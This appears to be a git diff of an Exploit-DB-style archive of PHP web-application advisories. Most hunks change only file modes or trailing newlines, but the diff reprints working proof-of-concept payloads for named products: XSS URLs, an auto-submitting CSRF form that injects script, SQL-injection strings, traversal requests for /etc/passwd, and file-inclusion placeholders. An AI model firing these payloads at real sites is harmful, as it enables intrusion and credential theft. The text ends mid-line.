a/platforms/php/webapps/34559.txt b/platforms/php/webapps/34559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34560.html b/platforms/php/webapps/34560.html old mode 100755 new mode 100644 index 86479c12f..c3a0952a2 --- a/platforms/php/webapps/34560.html +++ b/platforms/php/webapps/34560.html @@ -4,4 +4,4 @@ ArtGK CMS is prone to a cross-site scripting vulnerability and an HTML-injection Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. -<form action="http://host/cms/action?async=exit" method="post" name="main" > <input type="hidden" name="_a[0][action]" value="saveAndPublish" /> <input type="hidden" name="_a[0][id]" value="1" /> <input type="hidden" name="_a[0][vars][title]" value="page title" /> <input type="hidden" name="_a[0][vars][description]" value="description" /> <input type="hidden" name="_a[0][vars][keywords]" value="metakeys" /> <input type="hidden" name="_a[0][vars][link]" value="/" /> <input type="hidden" name="_a[0][vars][use_content_in_head]" value="path" /> <input type="hidden" name="_a[0][vars][head]" value='<script type="text/javascript" src="/cms/js/ajax.js"> </script><meta name="keywords" content="keywords"/><meta name="description" content="Description"/><script>alert(document.cookie)</script><title>Site Title</title>' /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://host/cms/action?async=exit" method="post" name="main" > <input type="hidden" name="_a[0][action]" value="saveAndPublish" /> <input type="hidden" name="_a[0][id]" value="1" /> <input type="hidden" name="_a[0][vars][title]" value="page title" /> <input type="hidden" name="_a[0][vars][description]" value="description" /> <input type="hidden" name="_a[0][vars][keywords]" value="metakeys" /> <input type="hidden" name="_a[0][vars][link]" value="/" /> <input type="hidden" name="_a[0][vars][use_content_in_head]" value="path" /> <input type="hidden" name="_a[0][vars][head]" value='<script type="text/javascript" src="/cms/js/ajax.js"> </script><meta name="keywords" content="keywords"/><meta name="description" content="Description"/><script>alert(document.cookie)</script><title>Site Title</title>' /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34561.txt b/platforms/php/webapps/34561.txt old mode 100755 new mode 100644 index 947324dad..69b302a20 --- a/platforms/php/webapps/34561.txt +++ b/platforms/php/webapps/34561.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor KingCMS 0.6.0 is vulnerable; other versions may be affected. -http://www.example.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL] \ No newline at end of file +http://www.example.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/34562.txt b/platforms/php/webapps/34562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34563.txt b/platforms/php/webapps/34563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34564.txt b/platforms/php/webapps/34564.txt old mode 100755 new mode 100644 index d9dd7efa4..0d0ffac02 --- a/platforms/php/webapps/34564.txt +++ b/platforms/php/webapps/34564.txt @@ -4,4 +4,4 @@ CMS WebManager-Pro is prone to an SQL-injection vulnerability because it fails t Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/c.php?id=1%20and%20version()=5 \ No newline at end of file +http://www.example.com/c.php?id=1%20and%20version()=5 \ No newline at end of file diff --git a/platforms/php/webapps/34565.txt b/platforms/php/webapps/34565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34572.txt b/platforms/php/webapps/34572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34578.txt b/platforms/php/webapps/34578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34579.txt b/platforms/php/webapps/34579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3458.txt b/platforms/php/webapps/3458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34580.txt b/platforms/php/webapps/34580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34581.txt b/platforms/php/webapps/34581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34582.txt b/platforms/php/webapps/34582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34585.txt b/platforms/php/webapps/34585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34586.txt b/platforms/php/webapps/34586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34589.txt b/platforms/php/webapps/34589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3459.txt b/platforms/php/webapps/3459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34593.txt b/platforms/php/webapps/34593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34596.txt b/platforms/php/webapps/34596.txt old mode 100755 new mode 100644 index 7d867c618..6a515dca9 --- a/platforms/php/webapps/34596.txt +++ b/platforms/php/webapps/34596.txt @@ -9,4 +9,4 @@ Pligg CMS 1.0.4 is vulnerable; other versions may also be affected. The following example URIs are available: http://www.example.com//pliggcms_1_0_4/login.php?email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f -http://www.example.com/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search \ No newline at end of file +http://www.example.com/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search \ No newline at end of file diff --git a/platforms/php/webapps/34597.txt b/platforms/php/webapps/34597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34598.txt b/platforms/php/webapps/34598.txt old mode 100755 new mode 100644 index 22e44eb88..fdacc5646 --- a/platforms/php/webapps/34598.txt +++ b/platforms/php/webapps/34598.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor SZNews 2.7 is vulnerable; other versions may also be affected. -http://www.example.com/path/printnews.php3?id=[shell.txt?] \ No newline at end of file +http://www.example.com/path/printnews.php3?id=[shell.txt?] \ No newline at end of file diff --git a/platforms/php/webapps/34599.txt b/platforms/php/webapps/34599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34600.txt b/platforms/php/webapps/34600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34601.txt b/platforms/php/webapps/34601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34604.php b/platforms/php/webapps/34604.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34605.txt b/platforms/php/webapps/34605.txt old mode 100755 new mode 100644 index 98cca8a3a..a255e11f0 --- a/platforms/php/webapps/34605.txt +++ b/platforms/php/webapps/34605.txt @@ -8,4 +8,4 @@ This issue affects versions prior to and including Horde 3.3.8. Note that additional products that use the Horde framework may also be vulnerable. -http://www.example.com/util/icon_browser.php?subdir=[xss]&app=horde \ No newline at end of file +http://www.example.com/util/icon_browser.php?subdir=[xss]&app=horde \ No newline at end of file diff --git a/platforms/php/webapps/34606.txt b/platforms/php/webapps/34606.txt old mode 100755 new mode 100644 index 8664bd1e2..4fa2f8ca5 --- a/platforms/php/webapps/34606.txt +++ b/platforms/php/webapps/34606.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Webformatique Reservation Manager 2.4.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?resman_startdate=[XSS] \ No newline at end of file +http://www.example.com/index.php?resman_startdate=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34607.txt b/platforms/php/webapps/34607.txt old mode 100755 new mode 100644 index 43f5c5d30..9c8abe5cf --- a/platforms/php/webapps/34607.txt +++ b/platforms/php/webapps/34607.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to execute malicious code within the TBDev 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/admincp.php?rootpath=(rfi) \ No newline at end of file +http://www.example.com/admincp.php?rootpath=(rfi) \ No newline at end of file diff --git a/platforms/php/webapps/34608.txt b/platforms/php/webapps/34608.txt old mode 100755 new mode 100644 index b4d0ce241..6c49a9451 --- a/platforms/php/webapps/34608.txt +++ b/platforms/php/webapps/34608.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor HeffnerCMS 1.22 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?page=lang/interface_en.lng%00 \ No newline at end of file +http://www.example.com/index.php?page=lang/interface_en.lng%00 \ No newline at end of file diff --git a/platforms/php/webapps/34609.txt b/platforms/php/webapps/34609.txt old mode 100755 new mode 100644 index 23b43e006..593f25f74 --- a/platforms/php/webapps/34609.txt +++ b/platforms/php/webapps/34609.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br The issue affects MySource Matrix 3.28.3; other versions may also be affected. -http://www.example.com/fudge/wysiwyg/plugins/special_chars/char_map.php?width=233%3C/script%3E&height=233%3Cscript%3Ealert%28%27zsl%27%29%3C%2fscript%3E \ No newline at end of file +http://www.example.com/fudge/wysiwyg/plugins/special_chars/char_map.php?width=233%3C/script%3E&height=233%3Cscript%3Ealert%28%27zsl%27%29%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/34610.txt b/platforms/php/webapps/34610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34611.txt b/platforms/php/webapps/34611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34616.txt b/platforms/php/webapps/34616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34617.txt b/platforms/php/webapps/34617.txt old mode 100755 new mode 100644 index a0d5ce9f6..c8bd3cc77 --- a/platforms/php/webapps/34617.txt +++ b/platforms/php/webapps/34617.txt @@ -4,4 +4,4 @@ Perlshop is prone to multiple input-validation vulnerabilities including a nonde Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, input arbitrary data to restricted parameters, and view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks. -http://www.example.cgi/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar \ No newline at end of file +http://www.example.cgi/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar \ No newline at end of file diff --git a/platforms/php/webapps/34618.txt b/platforms/php/webapps/34618.txt old mode 100755 new mode 100644 index 49af52b17..1e9eb3e89 --- a/platforms/php/webapps/34618.txt +++ b/platforms/php/webapps/34618.txt @@ -4,4 +4,4 @@ Omnistar Recruiting is prone to a cross-site scripting vulnerability because it An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34619.txt b/platforms/php/webapps/34619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34620.txt b/platforms/php/webapps/34620.txt old mode 100755 new mode 100644 index 1d705669e..3e6376d88 --- a/platforms/php/webapps/34620.txt +++ b/platforms/php/webapps/34620.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/image.php?image=[XSS] \ No newline at end of file +http://www.example.com/image.php?image=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34624.txt b/platforms/php/webapps/34624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34628.txt b/platforms/php/webapps/34628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34629.txt b/platforms/php/webapps/34629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34630.txt b/platforms/php/webapps/34630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34631.txt b/platforms/php/webapps/34631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34632.txt b/platforms/php/webapps/34632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34633.txt b/platforms/php/webapps/34633.txt old mode 100755 new mode 100644 index 5e2b03e80..ff1224480 --- a/platforms/php/webapps/34633.txt +++ b/platforms/php/webapps/34633.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Spiceworks 3.6.33156 and 4.1.39229 are vulnerable; other versions may also be affected. -http://www.example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/34634.txt b/platforms/php/webapps/34634.txt old mode 100755 new mode 100644 index b3e215adc..c9b6f2cdc --- a/platforms/php/webapps/34634.txt +++ b/platforms/php/webapps/34634.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br I-Escorts Directory Script and I-Escorts Agency Script are vulnerable. -http://www.example.com/demos/escorts-agency/escorts_search.php => Your XSS \ No newline at end of file +http://www.example.com/demos/escorts-agency/escorts_search.php => Your XSS \ No newline at end of file diff --git a/platforms/php/webapps/34635.txt b/platforms/php/webapps/34635.txt old mode 100755 new mode 100644 index d886d0f18..0d64f24c6 --- a/platforms/php/webapps/34635.txt +++ b/platforms/php/webapps/34635.txt @@ -4,4 +4,4 @@ Willscript Auction Website Script is prone to an SQL-injection vulnerability bec Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/webtrade/category.php?cate_id=-19%20union%20all%20select%201,version%28 \ No newline at end of file +http://www.example.com/webtrade/category.php?cate_id=-19%20union%20all%20select%201,version%28 \ No newline at end of file diff --git a/platforms/php/webapps/34636.txt b/platforms/php/webapps/34636.txt old mode 100755 new mode 100644 index ca402f4b6..5d5c80d13 --- a/platforms/php/webapps/34636.txt +++ b/platforms/php/webapps/34636.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor NWS-Classifieds 007 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?cmd=../../../../../../../../windows/system.ini%00 \ No newline at end of file +http://www.example.com/index.php?cmd=../../../../../../../../windows/system.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/34637.txt b/platforms/php/webapps/34637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34639.txt b/platforms/php/webapps/34639.txt old mode 100755 new mode 100644 index 28a187c16..81d4147ec --- a/platforms/php/webapps/34639.txt +++ b/platforms/php/webapps/34639.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to CMScout 2.09 is vulnerable; other versions may also be affected. -http://www.example.com/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00 \ No newline at end of file +http://www.example.com/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/34640.txt b/platforms/php/webapps/34640.txt old mode 100755 new mode 100644 index b1b59492f..00b2108a8 --- a/platforms/php/webapps/34640.txt +++ b/platforms/php/webapps/34640.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary JavaScript code in the Mollify 1.6 is vulnerable; other versions may also be affected. -http://www.example.com/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34642.txt b/platforms/php/webapps/34642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34643.txt b/platforms/php/webapps/34643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34644.txt b/platforms/php/webapps/34644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34645.txt b/platforms/php/webapps/34645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34646.txt b/platforms/php/webapps/34646.txt old mode 100755 new mode 100644 index 76e073c9b..e6e51aa51 --- a/platforms/php/webapps/34646.txt +++ b/platforms/php/webapps/34646.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example data is available: username: root"# -password: foo \ No newline at end of file +password: foo \ No newline at end of file diff --git a/platforms/php/webapps/34649.txt b/platforms/php/webapps/34649.txt old mode 100755 new mode 100644 index d10106f84..6fa88197f --- a/platforms/php/webapps/34649.txt +++ b/platforms/php/webapps/34649.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary HTML and script code in Netautor Professional 5.5.0 is vulnerable; other versions may also be affected. -http://www.example.com/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E \ No newline at end of file +http://www.example.com/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3465.txt b/platforms/php/webapps/3465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34650.txt b/platforms/php/webapps/34650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34651.txt b/platforms/php/webapps/34651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34652.txt b/platforms/php/webapps/34652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34653.txt b/platforms/php/webapps/34653.txt old mode 100755 new mode 100644 index 522e0510c..162a3c0fe --- a/platforms/php/webapps/34653.txt +++ b/platforms/php/webapps/34653.txt @@ -8,4 +8,4 @@ e107 0.7.23 is vulnerable; other versions may also be affected. http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7 -http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29 \ No newline at end of file +http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29 \ No newline at end of file diff --git a/platforms/php/webapps/34655.txt b/platforms/php/webapps/34655.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34656.txt b/platforms/php/webapps/34656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34657.txt b/platforms/php/webapps/34657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34658.txt b/platforms/php/webapps/34658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34659.txt b/platforms/php/webapps/34659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34660.txt b/platforms/php/webapps/34660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34661.txt b/platforms/php/webapps/34661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34662.txt b/platforms/php/webapps/34662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34663.txt b/platforms/php/webapps/34663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3467.txt b/platforms/php/webapps/3467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34673.txt b/platforms/php/webapps/34673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34674.txt b/platforms/php/webapps/34674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34675.txt b/platforms/php/webapps/34675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34676.txt b/platforms/php/webapps/34676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34677.txt b/platforms/php/webapps/34677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34678.txt b/platforms/php/webapps/34678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34679.txt b/platforms/php/webapps/34679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3468.txt b/platforms/php/webapps/3468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34681.txt b/platforms/php/webapps/34681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34683.txt b/platforms/php/webapps/34683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34684.pl b/platforms/php/webapps/34684.pl index 292adbfa7..9b5b97424 100755 --- a/platforms/php/webapps/34684.pl +++ b/platforms/php/webapps/34684.pl @@ -31,5 +31,4 @@ print "\n[+] Admin Hash : $1\n\n"; print "# Tebrikler Bro Exploit Calisti! #\n\n"; } else{print "\n[-] Malesef Bro Exploit Calismadi...\n"; -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/34688.txt b/platforms/php/webapps/34688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34689.txt b/platforms/php/webapps/34689.txt old mode 100755 new mode 100644 index 18fe0705f..149587031 --- a/platforms/php/webapps/34689.txt +++ b/platforms/php/webapps/34689.txt @@ -10,4 +10,4 @@ http://www.example.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4 The following data is available: -admin First : 'or 1=1 or ' & or & 'or 1=1/* \ No newline at end of file +admin First : 'or 1=1 or ' & or & 'or 1=1/* \ No newline at end of file diff --git a/platforms/php/webapps/34690.txt b/platforms/php/webapps/34690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34692.txt b/platforms/php/webapps/34692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34693.txt b/platforms/php/webapps/34693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34694.txt b/platforms/php/webapps/34694.txt old mode 100755 new mode 100644 index f913d7f1e..ab4cfc43b --- a/platforms/php/webapps/34694.txt +++ b/platforms/php/webapps/34694.txt @@ -11,4 +11,4 @@ The following example data is available: userid=q' or 1='1 username=q' or 1='1 -session=q' or 1='1 \ No newline at end of file +session=q' or 1='1 \ No newline at end of file diff --git a/platforms/php/webapps/34699.txt b/platforms/php/webapps/34699.txt old mode 100755 new mode 100644 index 392d5b804..5e1123c30 --- a/platforms/php/webapps/34699.txt +++ b/platforms/php/webapps/34699.txt @@ -10,4 +10,4 @@ https://www.example.com/livelink/livelink?func=ll&objId=514&objAction=browse&vie https://www.example.com/livelinkdav/nodes/OOB_DAVWindow.html?func=oobget&nodeid=514&support=/livelinksupport/&setctx=');[XSS] -https://www.example.com/livelink/livelink?func=ll&objid=1&objAction=browse&sort=[XSS] \ No newline at end of file +https://www.example.com/livelink/livelink?func=ll&objid=1&objAction=browse&sort=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34700.txt b/platforms/php/webapps/34700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34701.txt b/platforms/php/webapps/34701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34702.txt b/platforms/php/webapps/34702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34703.txt b/platforms/php/webapps/34703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34704.txt b/platforms/php/webapps/34704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34705.txt b/platforms/php/webapps/34705.txt old mode 100755 new mode 100644 index 58a0959d9..3530c1bff --- a/platforms/php/webapps/34705.txt +++ b/platforms/php/webapps/34705.txt @@ -8,4 +8,4 @@ APBook 1.3.0 is vulnerable; other versions may also be affected. The following example data is available: -Put as username and password: 'or 1=1/* \ No newline at end of file +Put as username and password: 'or 1=1/* \ No newline at end of file diff --git a/platforms/php/webapps/34706.txt b/platforms/php/webapps/34706.txt old mode 100755 new mode 100644 index aeadd5d7b..2a2244343 --- a/platforms/php/webapps/34706.txt +++ b/platforms/php/webapps/34706.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor MyDLstore Meta Search Engine Script 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/metasearch/index.php?url=evilcode.txt?&file=Search \ No newline at end of file +http://www.example.com/metasearch/index.php?url=evilcode.txt?&file=Search \ No newline at end of file diff --git a/platforms/php/webapps/34707.txt b/platforms/php/webapps/34707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34708.pl b/platforms/php/webapps/34708.pl index f20b3fb3c..e66d2c847 100755 --- a/platforms/php/webapps/34708.pl +++ b/platforms/php/webapps/34708.pl @@ -37,6 +37,4 @@ print "\n[+] Admin Hash : $1\n\n"; print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n"; } else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n"; -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/34709.txt b/platforms/php/webapps/34709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3471.txt b/platforms/php/webapps/3471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34710.txt b/platforms/php/webapps/34710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34711.txt b/platforms/php/webapps/34711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34712.txt b/platforms/php/webapps/34712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34713.txt b/platforms/php/webapps/34713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34714.txt b/platforms/php/webapps/34714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34715.txt b/platforms/php/webapps/34715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34717.txt b/platforms/php/webapps/34717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34718.txt b/platforms/php/webapps/34718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3472.txt b/platforms/php/webapps/3472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34721.txt b/platforms/php/webapps/34721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34722.txt b/platforms/php/webapps/34722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3473.txt b/platforms/php/webapps/3473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34730.txt b/platforms/php/webapps/34730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34731.txt b/platforms/php/webapps/34731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34732.txt b/platforms/php/webapps/34732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34733.txt b/platforms/php/webapps/34733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34734.txt b/platforms/php/webapps/34734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34735.txt b/platforms/php/webapps/34735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34736.txt b/platforms/php/webapps/34736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34737.txt b/platforms/php/webapps/34737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34738.txt b/platforms/php/webapps/34738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34740.txt b/platforms/php/webapps/34740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34741.txt b/platforms/php/webapps/34741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34742.txt b/platforms/php/webapps/34742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34743.txt b/platforms/php/webapps/34743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34744.txt b/platforms/php/webapps/34744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34745.txt b/platforms/php/webapps/34745.txt old mode 100755 new mode 100644 index 80125b124..905152c87 --- a/platforms/php/webapps/34745.txt +++ b/platforms/php/webapps/34745.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Ultra Classifieds Pro is vulnerable; other versions may also be affected. -http://www.example.com/ultraclassifieds/subclass.php?c=18&cname=1<script>alert(308954043099)</script> \ No newline at end of file +http://www.example.com/ultraclassifieds/subclass.php?c=18&cname=1<script>alert(308954043099)</script> \ No newline at end of file diff --git a/platforms/php/webapps/34746.txt b/platforms/php/webapps/34746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34747.txt b/platforms/php/webapps/34747.txt old mode 100755 new mode 100644 index f32dd04ee..994d7c50a --- a/platforms/php/webapps/34747.txt +++ b/platforms/php/webapps/34747.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor LittleSite 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/littlesite/index.php?file=../../../../etc/passwd \ No newline at end of file +http://www.example.com/littlesite/index.php?file=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/34748.txt b/platforms/php/webapps/34748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34749.txt b/platforms/php/webapps/34749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34758.txt b/platforms/php/webapps/34758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34759.txt b/platforms/php/webapps/34759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34760.txt b/platforms/php/webapps/34760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34761.txt b/platforms/php/webapps/34761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34762.txt b/platforms/php/webapps/34762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34763.txt b/platforms/php/webapps/34763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34764.txt b/platforms/php/webapps/34764.txt old mode 100755 new mode 100644 diff --git 